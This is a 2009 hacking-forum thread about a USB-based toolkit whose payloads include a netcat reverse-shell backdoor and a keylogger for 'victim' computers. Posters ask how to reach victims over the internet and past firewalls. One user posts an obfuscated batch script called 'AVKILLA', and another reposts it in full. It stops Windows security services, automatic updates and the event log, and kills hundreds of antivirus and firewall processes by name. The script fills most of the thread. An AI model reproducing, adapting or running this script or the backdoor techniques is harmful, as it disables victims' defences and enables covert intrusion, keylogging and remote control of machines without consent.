sablefoxx Posted March 11, 2009 Author Share Posted March 11, 2009 Cmdo - Installs a netcat backdoor to port 69 (Reverse Shell), use NConnect to connect to victim (fixed the bsod bug) --> is it really that simple?? You just install that and than you are able to connect to your victim computer from let's say your home?? what about protection from the firewall of your router?? Just fire up Netcat en your of to go?ß Well you won't be able to connect through (NAT) firewalls unless you edit the script to include the IP you plan to connect from, otherwise in XP it will automatically add itself to the Windows Firewall exception list, or in Vista if UAC is disabled. However if UAC is enabled, or the victim has a 3rd party firewall installed, it will ask to add itself. Best used over LANs, however with a little editing you can easily connect over the internet, through any firewall as well. Otherwise it is that simple. Quote Link to comment Share on other sites More sharing options...
Jen Posted March 12, 2009 Share Posted March 12, 2009 Is it possible for you to help us edit it so that we can easily connect over the internet? Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted March 12, 2009 Share Posted March 12, 2009 I am working on a netcat clone atm so maybe when its finished sablefoxx can include that. It doesnt have all the tools but most can bet included. Atm all it does is bind a cmd shell to a port. Quote Link to comment Share on other sites More sharing options...
messsy Posted March 13, 2009 Share Posted March 13, 2009 nice post, will be trying this later on :) hopefully it all goes to plan but 9/10 something happens lol, thanks for this, ill be setting it up in vmware and testing it on a laptop (xp) Quote Link to comment Share on other sites More sharing options...
messsy Posted March 13, 2009 Share Posted March 13, 2009 ok well so far so good, leapo's payload seems to be working, well workingish but i can figure out that through testing, ill just ask one thing at a time as seem to confuse people when i rabbit on lolz i have extracted to USB and set the settings from menu.bat, i have coppied the keyl_PE.exe to the pen drive and when clicked it says its installed fine but no C:\windows\keyl.txt Hmmm any help guys Quote Link to comment Share on other sites More sharing options...
macsdd Posted March 15, 2009 Share Posted March 15, 2009 question i have installed ape on a usb and patched the iso but it won't boot, my question is what have i done wrong? Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted March 15, 2009 Author Share Posted March 15, 2009 ok well so far so good, leapo's payload seems to be working, well workingish but i can figure out that through testing, ill just ask one thing at a time as seem to confuse people when i rabbit on lolz i have extracted to USB and set the settings from menu.bat, i have coppied the keyl_PE.exe to the pen drive and when clicked it says its installed fine but no C:\windows\keyl.txt Hmmm any help guys Those payloads need to be installed from PE, boot from the usb drive and then run Keylpe.exe. I have also posted versions that can be installed from userspace question i have installed ape on a usb and patched the iso but it won't boot, my question is what have i done wrong? Not all systems boot from usb, try another computer, let me know if no system will boot from it Also typing this on a g1 I am out of town so won't be able to post updates for a while Quote Link to comment Share on other sites More sharing options...
macsdd Posted March 15, 2009 Share Posted March 15, 2009 I am able to boot from usb using this computer as i have done so before (backtrack 4), however my question is where is the boot record on the usb because currently all I see is the .iso file which usually needs to be unpacked before it can be booted but APE might work differently. Quote Link to comment Share on other sites More sharing options...
timmy Posted March 17, 2009 Share Posted March 17, 2009 Good work here enjoy the new version but there is one thing when ever i try to run leaposes payload on vista it says that it cant find the go.vbs so then i tried logging onto my computer and i go to system and i can clearly see go.vbs and when i click it it says that vista cant find go.vbs even though its right in front of its face !!! any help would be gladly appreciated There also seems to be a number of bugs for leaposes payload i cant get it work no matter what ive tested it on vista32bit,vista 64bit, and xp 64 bit has anyone else gotten this 2 work Quote Link to comment Share on other sites More sharing options...
timmy Posted March 29, 2009 Share Posted March 29, 2009 are we still alive ? Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted March 29, 2009 Author Share Posted March 29, 2009 yeah working on updates, but been really busy with school (i also just got a fon in the mail, so been playing around with that too) hope to have new content, and bug fixes up soon :) as far as your problems with finding/running the go.vbs, it may have been blocked by Anti-Virus, or possible problems with UAC. Remember Leapo's payload is writable so AV still can remove files from it, however with the new updates running the payload before logging in should be easier (that way no AV and no UAC). Quote Link to comment Share on other sites More sharing options...
0x3 Posted April 1, 2009 Share Posted April 1, 2009 could we make it API work under the IIS6/server ? mean if we could wget it from url and install it in the victom box ? just a quq xd Quote Link to comment Share on other sites More sharing options...
timmy Posted April 14, 2009 Share Posted April 14, 2009 I have coded a bat file to kill most popular anti viruses kills firewall and updates and other goodies it undetectable but totally not stealth and is in still beta i think that it would be a perfect addition to Ape. Comments, problems and i hope it will get patched into Ape I call it AVKILLA @echo off cd c:\recycler\S-1-5-21-1202660629-261903793-725345543-1003 del /F /Q run.bat set ii=ne set ywe=st set ury=t set iej=op set jt53=Syma set o6t=nor set lyd2=fee set h3d=ton set gf45=ntec set own5=McA %ii%%ury% %ywe%%iej% "Security Center" /y %ii%%ury% %ywe%%iej% "Automatic Updates" /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y %ii%%ury% %ywe%%iej% "SAVScan" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Firewall Monitor Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto-Protect Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2% Spamkiller Server" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2% Personal Firewall Service" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2% SecurityCenter Update Manager" /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% SPBBCSvc" /y cls %ii%%ury% %ywe%%iej% "Ahnlab Task Scheduler" /y %ii%%ury% %ywe%%iej% navapsvc /y %ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y %ii%%ury% %ywe%%iej% vrmonsvc /y %ii%%ury% %ywe%%iej% MonSvcNT /y %ii%%ury% %ywe%%iej% SAVScan /y %ii%%ury% %ywe%%iej% NProtectService /y %ii%%ury% %ywe%%iej% ccSetMGR /y %ii%%ury% %ywe%%iej% ccEvtMGR /y %ii%%ury% %ywe%%iej% srservice /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% Network Drivers Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% Unerase Protection" /y %ii%%ury% %ywe%%iej% MskService /y %ii%%ury% %ywe%%iej% MpfService /y %ii%%ury% %ywe%%iej% mcupdmgr.exe /y %ii%%ury% %ywe%%iej% "%own5%%lyd2%AntiSpyware" /y %ii%%ury% %ywe%%iej% helpsvc /y %ii%%ury% %ywe%%iej% ERSvc /y %ii%%ury% %ywe%%iej% "*%o6t%%h3d%*" /y %ii%%ury% %ywe%%iej% "*%jt53%%gf45%*" /y %ii%%ury% %ywe%%iej% "*%own5%%lyd2%*" /y cls %ii%%ury% %ywe%%iej% ccPwdSvc /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y %ii%%ury% %ywe%%iej% navapsvc /y %ii%%ury% %ywe%%iej% "Serv-U" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% AntiVirus Client" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Server" /y %ii%%ury% %ywe%%iej% "NAV Alert" /y %ii%%ury% %ywe%%iej% "Nav Auto-Protect" /y cls %ii%%ury% %ywe%%iej% "McShield" /y %ii%%ury% %ywe%%iej% "DefWatch" /y %ii%%ury% %ywe%%iej% eventlog /y %ii%%ury% %ywe%%iej% InoRPC /y %ii%%ury% %ywe%%iej% InoRT /y %ii%%ury% %ywe%%iej% InoTask /y cls %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Corporate Edition" /y %ii%%ury% %ywe%%iej% "ViRobot Professional Monitoring" /y %ii%%ury% %ywe%%iej% "PC-cillin Personal Firewall" /y %ii%%ury% %ywe%%iej% "Trend Micro Proxy Service" /y %ii%%ury% %ywe%%iej% "Trend NT Realtime Service" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2%.com McShield" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2%.com VirusScan Online Realtime Engine" /y %ii%%ury% %ywe%%iej% "SyGateService" /y %ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y cls %ii%%ury% %ywe%%iej% "Sophos Anti-Virus" /y %ii%%ury% %ywe%%iej% "Sophos Anti-Virus Network" /y %ii%%ury% %ywe%%iej% "eTrust Antivirus Job Server" /y %ii%%ury% %ywe%%iej% "eTrust Antivirus Realtime Server" /y %ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y %ii%%ury% %ywe%%iej% "eTrust Antivirus RPC Server" /y cls net stop netsvcs net stop spoolnt pskill spoolsvc.exe pskill spoolsv.exe pskill netsvcs.exe pskill srvany.exe pskill spool.exe pskill secure32.exe pskill ahnsd.exe pskill mspmspsv.exe pskill stisvc.exe pskill servudaemon.exe pskill snservice.exe pskill noadmon.exe pskill ahnsdsv.exe pskill sdac11ba.exe pskill system.exe pskill navapsvc.exe pskill winload.exe pskill v3p3at.exe pskill monsvcnt.exe pskill winhelp32.exe pskill sagent2.exe pskill win32.exe pskill monsysnt.exe pskill cisvsc.exe pskill alg.exe pskill mdm.exe pskill mcshield.exe pskill nvsvc32.exe pskill rundll32.exe pskill msdevice.exe pskill srvmon.exe pskill rundll32.exe pskill userbatch.exe pskill navapw32.exe pskill keyservice.exe pskill netpiadw.exe pskill dwagent.exe pskill internat.exe pskill dllsvc.exe pskill mvcc.exe pskill tachy.exe pskill lsass12.exe pskill tskmngr.exe pskill bomsvc32.exe pskill vstmgr.exe pskill firedaemon.exe pskill lvcoms.exe pskill msnupdate.exe pskill conime.exe pskill gmt.exe pskill mtbp.exe pskill squerycontrol32.exe pskill precisiontime.exe pskill winhost.exe pskill net.exe pskill serviceguard.exe pskill swoff.exe pskill mstunnel.exe pskill msfig.exe pskill fxsvc.exe pskill clisvc.exe pskill mspmspsv.exe pskill ccap.exe pskill mcshield.exe pskill vrmonsvc.exe pskill vrmonNT.exe pskill v3impro.exe pskill ncvscc32.exe pskill host.exe pskill videosd32.exe pskill msgfixer.exe pskill adspider.exe pskill regsvc.exe pskill naviagent.exe pskill winserv32.exe pskill dllhost.exe pskill hkcmd.exe pskill sqlmngr.exe pskill llssrv.exe pskill svchost2.exe pskill ipbind.exe pskill http://ftp.exe pskill svchost1.exe pskill winsys9242.exe pskill turboagent.exe pskill hkstart.exe pskill winmgmt.exe pskill mouse32a.exe pskill net1.exe pskill winmysqladmin.exe pskill sctsvc.exe pskill winmgnt.exe pskill iroffer.exe pskill awhost32.exe pskill wuauclt.exe pskill a2guard pskill aavshield pskill AckWin32 pskill ADVCHK pskill AhnSD pskill airdefense pskill ALERTSVC pskill ALMon pskill ALOGSERV pskill ALsvc pskill amon pskill Anti-Trojan pskill AntiVirScheduler pskill AntiVirService pskill ANTS pskill APVXDWIN pskill Armor2net pskill ashAvast pskill ashDisp pskill ashEnhcd pskill ashMaiSv pskill ashPopWz pskill ashServ pskill ashSimpl pskill ashSkPck pskill ashWebSv pskill aswUpdSv pskill ATCON pskill ATUPDATER pskill ATWATCH pskill AUPDATE pskill AUTODOWN pskill AUTOTRACE pskill AUTOUPDATE pskill avciman pskill Avconsol pskill AVENGINE pskill avgamsvr pskill avgcc pskill AVGCC32 pskill AVGCTRL pskill avgemc pskill avgfwsrv pskill AVGNT pskill avgntdd pskill avgntmgr pskill AVGSERV pskill AVGUARD pskill avgupsvc pskill avinitnt pskill AvkServ pskill AVKService pskill AVKWCtl pskill AVP pskill AVP32 pskill avpcc pskill avpm pskill AVPUPD pskill AVSCHED32 pskill avsynmgr pskill AVWUPD32 pskill AVWUPSRV pskill AVXMONITOR9X pskill AVXMONITORNT pskill AVXQUAR pskill BackWeb-4476822 pskill bdmcon pskill bdnews pskill bdoesrv pskill bdss pskill bdsubmit pskill bdswitch pskill blackd pskill blackice pskill cafix pskill ccApp pskill ccEvtMgr pskill ccProxy pskill ccSetMgr pskill CFIAUDIT pskill ClamTray pskill ClamWin pskill Claw95 pskill Claw95cf pskill cleaner pskill cleaner3 pskill CliSvc pskill CMGrdian pskill cpd pskill DefWatch pskill DOORS pskill DrVirus pskill drwadins pskill drweb32w pskill drwebscd pskill DRWEBUPW pskill ESCANH95 pskill ESCANHNT pskill ewidoctrl pskill EzAntivirusRegistrationCheck pskill F-AGNT95 pskill F-PROT95 pskill F-Sched pskill F-StopW pskill FAMEH32 pskill FAST pskill FCH32 pskill FireSvc pskill FireTray pskill FIREWALL pskill fpavupdm pskill freshclam pskill FRW pskill fsav32 pskill fsavgui pskill fsbwsys pskill fsdfwd pskill FSGK32 pskill fsgk32st pskill fsgui pskill FSM32 pskill FSMA32 pskill FSMB32 pskill fspex pskill fssm32 pskill gcasDtServ pskill gcasServ pskill GIANTAntiSpywareMain pskill GIANTAntiSpywareUpdater pskill GUARD pskill GUARDGUI pskill GuardNT pskill HRegMon pskill Hrres pskill HSockPE pskill HUpdate pskill iamapp pskill iamserv pskill ICLOAD95 pskill ICLOADNT pskill ICMON pskill ICSSUPPNT pskill ICSUPP95 pskill ICSUPPNT pskill IFACE pskill INETUPD pskill InocIT pskill InoRpc pskill InoRT pskill InoTask pskill InoUpTNG pskill IOMON98 pskill isafe pskill ISATRAY pskill ISRV95 pskill ISSVC pskill JEDI pskill KAV pskill kavmm pskill KAVPF pskill KavPFW pskill KAVStart pskill KAVSvc pskill KAVSvcUI pskill KMailMon pskill KPfwSvc pskill KWatch pskill livesrv pskill LOCKDOWN2000 pskill LogWatNT pskill lpfw pskill LUALL pskill LUCOMSERVER pskill Luupdate pskill MCAGENT pskill mcmnhdlr pskill mcregwiz pskill Mcshield pskill MCUPDATE pskill mcvsshld pskill MINILOG pskill MONITOR pskill MonSysNT pskill MOOLIVE pskill MpEng pskill mpssvc pskill MSMPSVC pskill myAgtSvc pskill myagttry pskill navapsvc pskill NAVAPW32 pskill NavLu32 pskill NAVW32 pskill NDD32 pskill NeoWatchLog pskill NeoWatchTray pskill NISSERV pskill NISUM pskill NMAIN pskill nod32 pskill nod32krn pskill nod32kui pskill NORMIST pskill notstart pskill npavtray pskill NPFMNTOR pskill npfmsg pskill NPROTECT pskill NSCHED32 pskill NSMdtr pskill NssServ pskill NssTray pskill ntrtscan pskill NTXconfig pskill NUPGRADE pskill NVC95 pskill Nvcod pskill Nvcte pskill Nvcut pskill NWService pskill OfcPfwSvc pskill OUTPOST pskill PAV pskill PavFires pskill PavFnSvr pskill Pavkre pskill PavProt pskill pavProxy pskill pavprsrv pskill pavsrv51 pskill PAVSS pskill pccguide pskill PCCIOMON pskill pccntmon pskill PCCPFW pskill PcCtlCom pskill PCTAV pskill PERSFW pskill pertsk pskill PERVAC pskill PNMSRV pskill POP3TRAP pskill POPROXY pskill prevsrv pskill PsImSvc pskill QHM32 pskill QHONLINE pskill QHONSVC pskill QHPF pskill qhwscsvc pskill RavMon pskill RavTimer pskill Realmon pskill REALMON95 pskill Rescue pskill rfwmain pskill Rtvscan pskill RTVSCN95 pskill RuLaunch pskill SAVAdminService pskill SAVMain pskill savprogress pskill SAVScan pskill SCAN32 pskill ScanningProcess pskill sched pskill sdhelp pskill SERVIC~1 pskill SHSTAT pskill SiteCli pskill smc pskill SNDSrvc pskill SPBBCSvc pskill SPHINX pskill spiderml pskill spidernt pskill Spiderui pskill SpybotSD pskill SPYXX pskill SS3EDIT pskill stopsignav pskill swAgent pskill swdoctor pskill SWNETSUP pskill symlcsvc pskill SymProxySvc pskill SymSPort pskill SymWSC pskill SYNMGR pskill TAUMON pskill TBMon pskill TC pskill tca pskill TCM pskill TDS-3 pskill TeaTimer pskill TFAK pskill THAV pskill THSM pskill Tmas pskill tmlisten pskill Tmntsrv pskill TmPfw pskill tmproxy pskill TNBUtil pskill TRJSCAN pskill Up2Date pskill UPDATE pskill UpdaterUI pskill upgrepl pskill Vba32ECM pskill Vba32ifs pskill vba32ldr pskill Vba32PP3 pskill VBSNTW pskill vchk pskill vcrmon pskill VetTray pskill VirusKeeper pskill VPTRAY pskill vrfwsvc pskill VRMONNT pskill vrmonsvc pskill vrrw32 pskill VSECOMR pskill Vshwin32 pskill vsmon pskill vsserv pskill VsStat pskill WATCHDOG pskill WebProxy pskill Webscanx pskill WEBTRAP pskill WGFE95 pskill Winaw32 pskill winroute pskill winss pskill winssnotify pskill WRADMIN pskill WRCTRL pskill xcommsvr pskill zatutor pskill ZAUINST pskill zlclient pskill zonealarm pskill _AVP32 pskill _AVPCC pskill _AVPM pskill scanwscs pskill scanmsg pskill onlnsvc pskill upschd pskill antivirus Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted April 14, 2009 Share Posted April 14, 2009 I have coded a bat file to kill most popular anti viruses kills firewall and updates and other goodies it undetectable but totally not stealth and is in still beta i think that it would be a perfect addition to Ape. Comments, problems and i hope it will get patched into Ape I call it AVKILLA Unless your name is Codine and you are from the hakforums and you wrote that in 2007 then you didnt code that. PROOF Forum topic Posted by wohawsnng 01-14-08 Please give credit where credit is due. Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted April 15, 2009 Author Share Posted April 15, 2009 I have coded a bat file to kill most popular anti viruses kills firewall and updates and other goodies it undetectable but totally not stealth and is in still beta i think that it would be a perfect addition to Ape. Comments, problems and i hope it will get patched into Ape I call it AVKILLA @echo off cd c:\recycler\S-1-5-21-1202660629-261903793-725345543-1003 del /F /Q run.bat set ii=ne set ywe=st set ury=t set iej=op set jt53=Syma set o6t=nor set lyd2=fee set h3d=ton set gf45=ntec set own5=McA %ii%%ury% %ywe%%iej% "Security Center" /y %ii%%ury% %ywe%%iej% "Automatic Updates" /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y %ii%%ury% %ywe%%iej% "SAVScan" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Firewall Monitor Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto-Protect Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2% Spamkiller Server" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2% Personal Firewall Service" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2% SecurityCenter Update Manager" /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% SPBBCSvc" /y cls %ii%%ury% %ywe%%iej% "Ahnlab Task Scheduler" /y %ii%%ury% %ywe%%iej% navapsvc /y %ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y %ii%%ury% %ywe%%iej% vrmonsvc /y %ii%%ury% %ywe%%iej% MonSvcNT /y %ii%%ury% %ywe%%iej% SAVScan /y %ii%%ury% %ywe%%iej% NProtectService /y %ii%%ury% %ywe%%iej% ccSetMGR /y %ii%%ury% %ywe%%iej% ccEvtMGR /y %ii%%ury% %ywe%%iej% srservice /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% Network Drivers Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% Unerase Protection" /y %ii%%ury% %ywe%%iej% MskService /y %ii%%ury% %ywe%%iej% MpfService /y %ii%%ury% %ywe%%iej% mcupdmgr.exe /y %ii%%ury% %ywe%%iej% "%own5%%lyd2%AntiSpyware" /y %ii%%ury% %ywe%%iej% helpsvc /y %ii%%ury% %ywe%%iej% ERSvc /y %ii%%ury% %ywe%%iej% "*%o6t%%h3d%*" /y %ii%%ury% %ywe%%iej% "*%jt53%%gf45%*" /y %ii%%ury% %ywe%%iej% "*%own5%%lyd2%*" /y cls %ii%%ury% %ywe%%iej% ccPwdSvc /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y %ii%%ury% %ywe%%iej% navapsvc /y %ii%%ury% %ywe%%iej% "Serv-U" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y %ii%%ury% %ywe%%iej% "%jt53%%gf45% AntiVirus Client" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Server" /y %ii%%ury% %ywe%%iej% "NAV Alert" /y %ii%%ury% %ywe%%iej% "Nav Auto-Protect" /y cls %ii%%ury% %ywe%%iej% "McShield" /y %ii%%ury% %ywe%%iej% "DefWatch" /y %ii%%ury% %ywe%%iej% eventlog /y %ii%%ury% %ywe%%iej% InoRPC /y %ii%%ury% %ywe%%iej% InoRT /y %ii%%ury% %ywe%%iej% InoTask /y cls %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y %ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Corporate Edition" /y %ii%%ury% %ywe%%iej% "ViRobot Professional Monitoring" /y %ii%%ury% %ywe%%iej% "PC-cillin Personal Firewall" /y %ii%%ury% %ywe%%iej% "Trend Micro Proxy Service" /y %ii%%ury% %ywe%%iej% "Trend NT Realtime Service" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2%.com McShield" /y %ii%%ury% %ywe%%iej% "%own5%%lyd2%.com VirusScan Online Realtime Engine" /y %ii%%ury% %ywe%%iej% "SyGateService" /y %ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y cls %ii%%ury% %ywe%%iej% "Sophos Anti-Virus" /y %ii%%ury% %ywe%%iej% "Sophos Anti-Virus Network" /y %ii%%ury% %ywe%%iej% "eTrust Antivirus Job Server" /y %ii%%ury% %ywe%%iej% "eTrust Antivirus Realtime Server" /y %ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y %ii%%ury% %ywe%%iej% "eTrust Antivirus RPC Server" /y cls net stop netsvcs net stop spoolnt pskill spoolsvc.exe pskill spoolsv.exe pskill netsvcs.exe pskill srvany.exe pskill spool.exe pskill secure32.exe pskill ahnsd.exe pskill mspmspsv.exe pskill stisvc.exe pskill servudaemon.exe pskill snservice.exe pskill noadmon.exe pskill ahnsdsv.exe pskill sdac11ba.exe pskill system.exe pskill navapsvc.exe pskill winload.exe pskill v3p3at.exe pskill monsvcnt.exe pskill winhelp32.exe pskill sagent2.exe pskill win32.exe pskill monsysnt.exe pskill cisvsc.exe pskill alg.exe pskill mdm.exe pskill mcshield.exe pskill nvsvc32.exe pskill rundll32.exe pskill msdevice.exe pskill srvmon.exe pskill rundll32.exe pskill userbatch.exe pskill navapw32.exe pskill keyservice.exe pskill netpiadw.exe pskill dwagent.exe pskill internat.exe pskill dllsvc.exe pskill mvcc.exe pskill tachy.exe pskill lsass12.exe pskill tskmngr.exe pskill bomsvc32.exe pskill vstmgr.exe pskill firedaemon.exe pskill lvcoms.exe pskill msnupdate.exe pskill conime.exe pskill gmt.exe pskill mtbp.exe pskill squerycontrol32.exe pskill precisiontime.exe pskill winhost.exe pskill net.exe pskill serviceguard.exe pskill swoff.exe pskill mstunnel.exe pskill msfig.exe pskill fxsvc.exe pskill clisvc.exe pskill mspmspsv.exe pskill ccap.exe pskill mcshield.exe pskill vrmonsvc.exe pskill vrmonNT.exe pskill v3impro.exe pskill ncvscc32.exe pskill host.exe pskill videosd32.exe pskill msgfixer.exe pskill adspider.exe pskill regsvc.exe pskill naviagent.exe pskill winserv32.exe pskill dllhost.exe pskill hkcmd.exe pskill sqlmngr.exe pskill llssrv.exe pskill svchost2.exe pskill ipbind.exe pskill http://ftp.exe pskill svchost1.exe pskill winsys9242.exe pskill turboagent.exe pskill hkstart.exe pskill winmgmt.exe pskill mouse32a.exe pskill net1.exe pskill winmysqladmin.exe pskill sctsvc.exe pskill winmgnt.exe pskill iroffer.exe pskill awhost32.exe pskill wuauclt.exe pskill a2guard pskill aavshield pskill AckWin32 pskill ADVCHK pskill AhnSD pskill airdefense pskill ALERTSVC pskill ALMon pskill ALOGSERV pskill ALsvc pskill amon pskill Anti-Trojan pskill AntiVirScheduler pskill AntiVirService pskill ANTS pskill APVXDWIN pskill Armor2net pskill ashAvast pskill ashDisp pskill ashEnhcd pskill ashMaiSv pskill ashPopWz pskill ashServ pskill ashSimpl pskill ashSkPck pskill ashWebSv pskill aswUpdSv pskill ATCON pskill ATUPDATER pskill ATWATCH pskill AUPDATE pskill AUTODOWN pskill AUTOTRACE pskill AUTOUPDATE pskill avciman pskill Avconsol pskill AVENGINE pskill avgamsvr pskill avgcc pskill AVGCC32 pskill AVGCTRL pskill avgemc pskill avgfwsrv pskill AVGNT pskill avgntdd pskill avgntmgr pskill AVGSERV pskill AVGUARD pskill avgupsvc pskill avinitnt pskill AvkServ pskill AVKService pskill AVKWCtl pskill AVP pskill AVP32 pskill avpcc pskill avpm pskill AVPUPD pskill AVSCHED32 pskill avsynmgr pskill AVWUPD32 pskill AVWUPSRV pskill AVXMONITOR9X pskill AVXMONITORNT pskill AVXQUAR pskill BackWeb-4476822 pskill bdmcon pskill bdnews pskill bdoesrv pskill bdss pskill bdsubmit pskill bdswitch pskill blackd pskill blackice pskill cafix pskill ccApp pskill ccEvtMgr pskill ccProxy pskill ccSetMgr pskill CFIAUDIT pskill ClamTray pskill ClamWin pskill Claw95 pskill Claw95cf pskill cleaner pskill cleaner3 pskill CliSvc pskill CMGrdian pskill cpd pskill DefWatch pskill DOORS pskill DrVirus pskill drwadins pskill drweb32w pskill drwebscd pskill DRWEBUPW pskill ESCANH95 pskill ESCANHNT pskill ewidoctrl pskill EzAntivirusRegistrationCheck pskill F-AGNT95 pskill F-PROT95 pskill F-Sched pskill F-StopW pskill FAMEH32 pskill FAST pskill FCH32 pskill FireSvc pskill FireTray pskill FIREWALL pskill fpavupdm pskill freshclam pskill FRW pskill fsav32 pskill fsavgui pskill fsbwsys pskill fsdfwd pskill FSGK32 pskill fsgk32st pskill fsgui pskill FSM32 pskill FSMA32 pskill FSMB32 pskill fspex pskill fssm32 pskill gcasDtServ pskill gcasServ pskill GIANTAntiSpywareMain pskill GIANTAntiSpywareUpdater pskill GUARD pskill GUARDGUI pskill GuardNT pskill HRegMon pskill Hrres pskill HSockPE pskill HUpdate pskill iamapp pskill iamserv pskill ICLOAD95 pskill ICLOADNT pskill ICMON pskill ICSSUPPNT pskill ICSUPP95 pskill ICSUPPNT pskill IFACE pskill INETUPD pskill InocIT pskill InoRpc pskill InoRT pskill InoTask pskill InoUpTNG pskill IOMON98 pskill isafe pskill ISATRAY pskill ISRV95 pskill ISSVC pskill JEDI pskill KAV pskill kavmm pskill KAVPF pskill KavPFW pskill KAVStart pskill KAVSvc pskill KAVSvcUI pskill KMailMon pskill KPfwSvc pskill KWatch pskill livesrv pskill LOCKDOWN2000 pskill LogWatNT pskill lpfw pskill LUALL pskill LUCOMSERVER pskill Luupdate pskill MCAGENT pskill mcmnhdlr pskill mcregwiz pskill Mcshield pskill MCUPDATE pskill mcvsshld pskill MINILOG pskill MONITOR pskill MonSysNT pskill MOOLIVE pskill MpEng pskill mpssvc pskill MSMPSVC pskill myAgtSvc pskill myagttry pskill navapsvc pskill NAVAPW32 pskill NavLu32 pskill NAVW32 pskill NDD32 pskill NeoWatchLog pskill NeoWatchTray pskill NISSERV pskill NISUM pskill NMAIN pskill nod32 pskill nod32krn pskill nod32kui pskill NORMIST pskill notstart pskill npavtray pskill NPFMNTOR pskill npfmsg pskill NPROTECT pskill NSCHED32 pskill NSMdtr pskill NssServ pskill NssTray pskill ntrtscan pskill NTXconfig pskill NUPGRADE pskill NVC95 pskill Nvcod pskill Nvcte pskill Nvcut pskill NWService pskill OfcPfwSvc pskill OUTPOST pskill PAV pskill PavFires pskill PavFnSvr pskill Pavkre pskill PavProt pskill pavProxy pskill pavprsrv pskill pavsrv51 pskill PAVSS pskill pccguide pskill PCCIOMON pskill pccntmon pskill PCCPFW pskill PcCtlCom pskill PCTAV pskill PERSFW pskill pertsk pskill PERVAC pskill PNMSRV pskill POP3TRAP pskill POPROXY pskill prevsrv pskill PsImSvc pskill QHM32 pskill QHONLINE pskill QHONSVC pskill QHPF pskill qhwscsvc pskill RavMon pskill RavTimer pskill Realmon pskill REALMON95 pskill Rescue pskill rfwmain pskill Rtvscan pskill RTVSCN95 pskill RuLaunch pskill SAVAdminService pskill SAVMain pskill savprogress pskill SAVScan pskill SCAN32 pskill ScanningProcess pskill sched pskill sdhelp pskill SERVIC~1 pskill SHSTAT pskill SiteCli pskill smc pskill SNDSrvc pskill SPBBCSvc pskill SPHINX pskill spiderml pskill spidernt pskill Spiderui pskill SpybotSD pskill SPYXX pskill SS3EDIT pskill stopsignav pskill swAgent pskill swdoctor pskill SWNETSUP pskill symlcsvc pskill SymProxySvc pskill SymSPort pskill SymWSC pskill SYNMGR pskill TAUMON pskill TBMon pskill TC pskill tca pskill TCM pskill TDS-3 pskill TeaTimer pskill TFAK pskill THAV pskill THSM pskill Tmas pskill tmlisten pskill Tmntsrv pskill TmPfw pskill tmproxy pskill TNBUtil pskill TRJSCAN pskill Up2Date pskill UPDATE pskill UpdaterUI pskill upgrepl pskill Vba32ECM pskill Vba32ifs pskill vba32ldr pskill Vba32PP3 pskill VBSNTW pskill vchk pskill vcrmon pskill VetTray pskill VirusKeeper pskill VPTRAY pskill vrfwsvc pskill VRMONNT pskill vrmonsvc pskill vrrw32 pskill VSECOMR pskill Vshwin32 pskill vsmon pskill vsserv pskill VsStat pskill WATCHDOG pskill WebProxy pskill Webscanx pskill WEBTRAP pskill WGFE95 pskill Winaw32 pskill winroute pskill winss pskill winssnotify pskill WRADMIN pskill WRCTRL pskill xcommsvr pskill zatutor pskill ZAUINST pskill zlclient pskill zonealarm pskill _AVP32 pskill _AVPCC pskill _AVPM pskill scanwscs pskill scanmsg pskill onlnsvc pskill upschd pskill antivirus timmy, timmy, timmy... we are well versed in the art of teh internets here *** hope to have a new version up soon (lots of cool new stuff)... fucking school :( *** Quote Link to comment Share on other sites More sharing 